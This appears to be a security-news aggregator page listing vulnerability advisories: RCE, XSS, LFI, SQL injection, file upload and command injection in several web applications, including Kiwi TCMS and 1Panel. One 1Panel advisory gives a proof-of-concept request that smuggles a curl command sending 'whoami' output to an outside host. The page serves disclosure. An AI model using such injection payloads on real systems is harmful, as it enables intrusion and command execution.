Security
Headlines
HeadlinesLatestCVEs

Tag

#firefox

DaillyTools Remote Command Execution

DaillyTools suffers from a remote command execution vulnerability.

Packet Storm
Open in Source
#vulnerability#windows#google#git#php#auth#firefox
CakePHP Test Suite 2.7.0 Cross Site Scripting

CakePHP Test Suite version 2.7.0 suffers from a cross site scripting vulnerability.

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Local File Inclusion

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a local file inclusion vulnerability.

AGVirtues Galeria 2.0 SQL Injection

AGVirtues Galeria version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

CVE-2020-21861: Insecure configuration causes getshell · Issue #I182Y4 · 王爷/DuxCMS2.1支持php7.0以上版本 - Gitee.com

File upload vulnerability in DuxCMS 2.1 allows attackers to execute arbitrary php code via duxcms/AdminUpload/upload.

Archon CMS 3.14 Cross Site Scripting

Archon CMS version 3.14 suffers from a cross site scripting vulnerability.

GHSA-jpgw-2r9m-8qfw: Kiwi TCMS's misconfigured HTTP headers allow stored XSS execution with Firefox

### Impact Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced changes which were meant to serve all uploaded files as plain text in order to prevent browsers from executing potentially dangerous files when such files are accessed directly! The previous Nginx configuration was incorrect allowing certain browsers like Firefox to ignore the `Content-Type: text/plain` header on some occasions thus allowing potentially dangerous scripts to be executed. Additionally file upload validators and parts of the HTML rendering code have been found to require additional sanitation and improvements. ### Patches - Updated Nginx content type configuration - Improved file upload validation code to prevent more potentially dangerous uploads - Sanitization of test plan names used in the `tree_view_html()` function ### References Disclosed by [M Nadeem Qazi](https://huntr.dev/bounties/511489dd-ba38-4806-9029-b28ab2830aa8/) and ...

CVE-2023-36809: Sanitize test plan name in tree_view_html() · kiwitcms/Kiwi@195ea53

Kiwi TCMS, an open source test management system allows users to upload attachments to test plans, test cases, etc. Versions of Kiwi TCMS prior to 12.5 had introduced changes which were meant to serve all uploaded files as plain text in order to prevent browsers from executing potentially dangerous files when such files are accessed directly. The previous Nginx configuration was incorrect allowing certain browsers like Firefox to ignore the `Content-Type: text/plain` header on some occasions thus allowing potentially dangerous scripts to be executed. Additionally, file upload validators and parts of the HTML rendering code had been found to require additional sanitation and improvements. Version 12.5 fixes this vulnerability with updated Nginx content type configuration, improved file upload validation code to prevent more potentially dangerous uploads, and Sanitization of test plan names used in the `tree_view_html()` function.

GHSA-7x2c-fgx6-xf9h: 1Panel vulnerable to ommand injection when entering the container terminal

### Impact The authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal. 1. Vulnerability analysis. ``` backend\app\api\v1\terminal.go#ContainerWsSsh ``` ![image](https://user-images.githubusercontent.com/46734380/249119420-045ec192-250d-4d07-a69e-0bd794cddec7.png) 2. vulnerability reproduction. ``` GET /api/v1/containers/exec?cols=80&rows=24&containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||&user=asd&command=/bin/bash HTTP/1.1 Host: 192.168.109.152:40982 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Sec-WebSocket-Version: 13 Origin: http://192.168.109.152:40982 Sec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ== Connection: keep-alive, Upgrade Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e Pragma: no-cache Cache-Control: no-cache Upgrade: websocket ``` 3. The su...

GHSA-q2mx-gpjf-3h8x: 1Panel vulnerable to command injection when adding container repositories

### Impact The authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. 1. Vulnerability analysis. ``` backend\app\api\v1\image_repo.go#create ``` ![image](https://user-images.githubusercontent.com/46734380/249118560-8c20dac6-d1be-49d2-b2b2-9a4df9b7cd04.png) ``` backend\app\service\image_repo.go#CheckConn ``` ![image](https://user-images.githubusercontent.com/46734380/249118639-37b7a1e9-08a9-4316-8beb-39beefdceb33.png) 2. vulnerability reproduction. ``` POST /api/v1/containers/repo HTTP/1.1 Host: 192.168.109.152:40982 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-CSRF-TOKEN: Content-Length: 446 Origin: http://192.168.109.152:40982 Connection: close Referer: http://192.168.109.152:40982/containers/repo Cookie: rem-username=admin; psession...